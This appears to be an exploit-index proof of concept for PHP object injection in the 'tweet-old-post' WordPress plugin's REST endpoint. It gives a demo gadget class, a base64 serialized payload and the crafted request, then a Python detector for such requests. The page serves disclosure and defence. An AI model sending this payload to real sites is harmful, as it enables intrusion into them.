## https://sploitus.com/exploit?id=WPEX-ID:F4197386-975D-4E53-8FC9-9425732DA9AF
To simulate a gadget chain, put the following code in a plugin:

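```php
// Stand-in for a gadget class: __wakeup() runs automatically when an
// instance is created by unserialize(), which proves the injection.
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}
```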

Use the add account function, intercept the request, and add or replace the `id` or `pages` parameter with `Tzo0OiJFdmlsIjowOnt9Ow==` (the base64 encoding of `O:4:"Evil":0:{};`):

```http
POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1

{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}
```
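For detection, the request above can be recognized by decoding each base64 string in the JSON body and looking for a PHP serialized-object marker. The following is an added example, not code from the original page or from the plugin; the function names are hypothetical, and it assumes request bodies are available as text from a proxy or WAF log.

```python
import base64
import binascii
import json
import re

# PHP serialize() object markers (O: object, C: custom-serialized object),
# at the start of the value or nested after ';' or '{' inside an array.
PHP_OBJECT = re.compile(rb'(?:^|[;{])[OC]:\d+:"([^"]+)":\d+:')
# Request body taken from the page above.
SAMPLE_BODY = '{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}'


def decode_b64(value):
    """Return the decoded bytes if value is strict base64, else None."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def walk(node, path=""):
    """Yield (json_path, string) for every string value in parsed JSON."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, child in node.items():
            yield from walk(child, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from walk(child, f"{path}[{i}]")


def find_serialized_objects(body):
    """Return [(json_path, class_name)] for base64 fields holding PHP objects."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    hits = []
    for path, text in walk(doc):
        raw = decode_b64(text)
        match = PHP_OBJECT.search(raw) if raw else None
        if match:
            hits.append((path, match.group(1).decode("utf-8", "replace")))
    return hits


if __name__ == "__main__":
    print(find_serialized_objects(SAMPLE_BODY))
```

Serialized scalars and arrays without objects are not flagged, so a hit on `id` or `pages` for this endpoint is a strong triage signal.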